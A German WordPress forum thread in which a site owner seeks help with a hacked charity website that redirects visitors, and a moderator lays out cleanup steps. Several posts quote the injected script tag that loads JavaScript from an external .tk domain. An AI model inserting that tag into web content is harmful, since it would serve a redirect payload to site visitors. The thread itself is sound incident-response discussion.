Hack? Weiterleitung auf unterschiedliche Seiten, aber nur beim ersten Aufruf

  • mhsoz

    (@mhsoz)


    vor 7 Jahren, 10 Monaten

    Hallo,
    ich habe eine recht ungewartete WP Seite einer gemeinnützigen Einrichtung übernommen, habe aber selbst nicht wirklich viel Ahnung: sozialkaufhaus-augsburg.de

    Das Problem seit kurzem: Beim Aufruf der Seite über einen xbeliebigen Browser wird man auf diverse andere Seiten weitergeleitet, Spieleseiten, pornöse Seiten, aber auch mal auf Bing, also wechselnd.
    Aber seltsam ist: Wenn man dann die Seite schließt und sich wieder einwählt wird die Seite ordentlich geladen, als wäre alles in Ordnung. Nach einer gewissen Zeit geht der Spuk wieder los und die Weiterleitungen beginnen wieder.
    Ich habs mit allen Browsern, auf dem Handy, über TOR und von fremden PCs probiert, überall dasselbe.

    Die diversen VirenScanner (von außerhalb) finden nichts. Aufmerksam gemacht hat uns Google darauf, weil sie auf die Seite keine adwords Anzeigen mehr liefern.

    Ich habe wordpress und alle plugins upgedated, unnötige plugins und themes gelöscht.Und neue Passwörter eingerichtet, sowie Backups gemacht.
    Dann sucuri installiert und den Hinweis auf javascript mit Ziel:

    https://nameserverdom.tk/assdhdfer

    erhalten.
    Außerdem danach wordfence, da bin ich auch nicht weitergekommen.Das zeigt mir Unmengen modifizierter Files an, aber was ich gesehen habe ist, dass das nur ein Englisch/Deutsch Problem ist.
    Dann habe ich die Datenbank auf https://nameserverdom.tk/assdhdfer durchsucht und finde diesen String recht oft.

    Was soll ich machen? Einfach den String löschen?
    Es sind keine,oder vielmehr nur uralte Backups vorhanden.
    Bitte um eure Hilfe

Ansicht von 5 Antworten – 1 bis 5 (von insgesamt 5)
  • Thread-Starter mhsoz

    (@mhsoz)

    vor 7 Jahren, 10 Monaten

    Zusatinfo:
    Dieser String:
    <script src=\’https://nameserverdom.tk/assdhdfer\‘ type=\’text/javascript\‘></script>

    wird insgesamt 1954 x in der Datenbank gefunden. Mit notepad++ gesucht.

    Mit welchem mysql Datenbankbefehl kann ich das komplett rauslöschen?

    Moderator Bego Mario Garde

    (@pixolin)

    Moderator (nicht mehr aktiv)

    vor 7 Jahren, 10 Monaten

    Wenn du keine Backups und selber wenig Ahnung hast, solltest zur Wiederherstellung jemanden beauftragen, der sich auskennt (findest du in Google). Die Gefahr, dass du eine Hintertür übersiehst und der Angreifer erneut zuschlägt, ist recht groß.

    Grundsätzlich läuft die Wiederherstellung so ab:

    • Vorhandene Website offline nehmen (index.html mit Wartungshinweis erstellen und ins Web-Stammverzeichnis hochladen)
    • Passwörter aller Nutzer ändern – in WordPress, für den FTP-Zugang, für das Kundenmenü beim Webhoster. Eigenen Computer auf Viren/Trojaner prüfen.
    • Per FTP Backup aller Dateien.
    • Per phpMyAdmin (findest du im Kundenmenü deines Webhoster) Datenbank aufrufen, in der Tabelle wp_users nach möglichen Einträgen des Angreifers suchen (gerne getarnt als admin, administrator, …) und entfernen. In allen Tabellen nach Textstring <script src=\’https://nameserverdom.tk/assdhdfer\‘ type=\’text/javascript\‘></script> suchen und entfernen. Backup der Datenbank.
    • Notier dir, welche Plugins installiert waren (Verzeichnis wp-content/plugins oder im Backend nachschauen) und schau nach, ob aktuell alle Plugins im WordPress-Verzeichnis erhältlich sind (kannst du dann auch gleich herunterladen).
    • Löschen aller Dateien auf dem Webserver (gerne wird ein Verzeichnis „Blog“, „System“ oder „tmp“ angelegt, um den Anschein zu erwecken, es würde sich um Dateien des Webservers handeln – hier steckt dann aber ein Script, über das sich der Angreifer wieder anmelden kann, eine so genannte Backdoor).
    • Im Verzeichnis wp-content alle Unterverzeichnisse bis auf diese Ausnahmen löschen:
    • Verzeichnis themes/sozialkaufhaus
    • Verzeichnis uploads
    • die übriggebliebenen Dateien müssen alle einzeln nach Schadcode durchgeschaut werden. Das setzt natürlich voraus, dass du guten von schlechtem Code unterscheiden kannst. Auch vermeintliche Bilddateien (*.jpeg, *.jpg, *.png, *.gif) können tatsächlich Schadcode enthalten.
    • Frische WordPress-Dateien ohne wp-content besorgen: https://downloads.wordpress.org/release/wordpress-4.8-no-content.zip, Datei entpacken
    • Bereinigtes Verzeichnis wp-content in das entpackte Verzeichnis wordpress verschieben.
    • In Schritt 2 heruntergeladene Plugins in wordpress/wp-content/plugins entpacken.
    • Alle Dateien und (Unter-)Verzeichnisse aus dem Verzeichnis wordpress per FTP in das (bis auf index.html) leere Web-Stammverzeichnis hochladen.
    • In Schritt 1 erstellte index.html wieder löschen, im Backend einloggen und alles prüfen.
    • Künftig WordPress und alle Plugins immer zeitnah aktualisieren, nicht über offen zugängliches W-Lan anmelden und starke Passwörter verwenden.

      • Nachtrag: Punkt 2 um Bereinigung des JavaScript ergänzt.

    • Diese Antwort wurde geändert vor 7 Jahren, 10 Monaten von Bego Mario Garde. Grund: Nachtrag
    • Diese Antwort wurde geändert vor 7 Jahren, 10 Monaten von Bego Mario Garde. Grund: Nachtrag 2: Verhaltenstips nach Bereinigung hinzugefügt
    Thread-Starter mhsoz

    (@mhsoz)

    vor 7 Jahren, 10 Monaten

    Hi,
    herzlichen Dank für Deine Mühe, werde das alles abarbeiten.
    Das Entfernen des Schadcodes aus der Datenbank scheint zumindest erstsmal geholfen zu haben.
    Sonst habe ich bis jetzt nichts gefunden, was mir komisch vorkommt

    brunomtsilva

    (@brunomtsilva)

    vor 7 Jahren, 10 Monaten

    Hi have been attacked in the same way.
    Any one can give more details how does this happen and who is behind this?
    Regards,
    Bruno Silva

    Thread-Starter mhsoz

    (@mhsoz)

    vor 7 Jahren, 10 Monaten

    Hallo,

    ich war mir sicher, dass alles wieder okay ist, weil es 5 Tage lang funktionierte, jetzt ist es wieder zurück. Ich werde daher das System komplett neu aufsetzen, das kostet mich auch nicht mehr Zeit als die Liste abarbeiten.
    Ich hatte noch nicht die ganze Liste von mhsoz abgearbeitet, siehe oben.
    Woher der hack kommt, keine Ahnung, ich konnte auch nichts dergleichen auf google finden

    Grüße

Ansicht von 5 Antworten – 1 bis 5 (von insgesamt 5)
  • Das Thema „Hack? Weiterleitung auf unterschiedliche Seiten, aber nur beim ersten Aufruf“ ist für neue Antworten geschlossen.